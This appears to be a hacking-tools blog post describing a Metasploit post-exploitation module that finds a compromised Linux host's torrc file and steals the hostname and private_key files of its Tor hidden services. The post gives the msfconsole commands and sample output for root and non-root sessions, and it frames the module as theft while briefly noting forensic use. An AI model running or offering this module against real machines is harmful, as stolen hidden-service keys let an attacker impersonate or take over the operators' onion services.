All for Joomla All for Webmasters
Hacking tools

Grab TOR hidden service configurations in linux – Advance Footprinting

This is nice and clean post exploitation that steals hostnames and private keys of TOR hidden services originating from the target machine. The technique can be used and implemented in Advance Footprinting as well as Forensics.

Tested against Debian GNU/Linux 8 running kernel version 3.16.0-4-amd64 from Arch Linux kernel version 4.11.3-1-ARCH

What it does

  • Searches for the TOR configuration file “torrc” (typically /etc/tor/torrc, but could change).
  • Parses the found file for lines starting with “HiddenServiceDir” and grabs the locations of the hidden services on the system (again, typically /var/lib/tor/… on most distros by default).
  • Finally loots the files “hostname” and “private_key” found in each of these folders.

Example Output for root session

msf > use post/linux/gather/tor_hiddenservices
msf post(tor_hiddenservices) > set SESSION 1
SESSION => 1
msf post(tor_hiddenservices) > run

[*] Running module against 10.0.2.15
[*] Info:
[*] 	Debian GNU/Linux 8  
[*] 	Linux hidden 3.16.0-4-amd64 #1 SMP Debian 3.16.43-2 (2017-04-30) x86_64 GNU/Linux
[*] Looking for torrc...
[+] Torrc file found at /etc/tor/torrc
[+] Hidden Services found!
[*] hidden stored in /home/user/.msf4/loot/20170606210603_default_192.168.1.140_tor.hidden.hostn_479046.txt
[*] hidden stored in /home/user/.msf4/loot/20170606210603_default_192.168.1.140_tor.hidden.priva_933706.txt
[*] Post module execution completed

Example Output for non-root session

msf > use post/linux/gather/tor_hiddenservices
msf post(tor_hiddenservices) > set SESSION 2
SESSION => 2
msf post(tor_hiddenservices) > run

[*] Running module against 10.0.2.15
[*] Info:
[*] 	Debian GNU/Linux 8  
[*] 	Linux hidden 3.16.0-4-amd64 #1 SMP Debian 3.16.43-2 (2017-04-30) x86_64 GNU/Linux
[*] Looking for torrc...
[+] Torrc file found at /etc/tor/torrc
[+] Hidden Services found!
[-] Hidden Services were found, but we need root to access the directories
[*] Post module execution completed
Grab TOR hidden service configurations in linux – Advance Footprinting
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

To Top
Facebook Auto Publish Powered By : XYZScripts.com

Get your Daily Tech update

Subscribe to TechWorld Daily Email Newsletter

Get Daily Tech News & Notifications about technology of our life to you via Email.

*use valid email address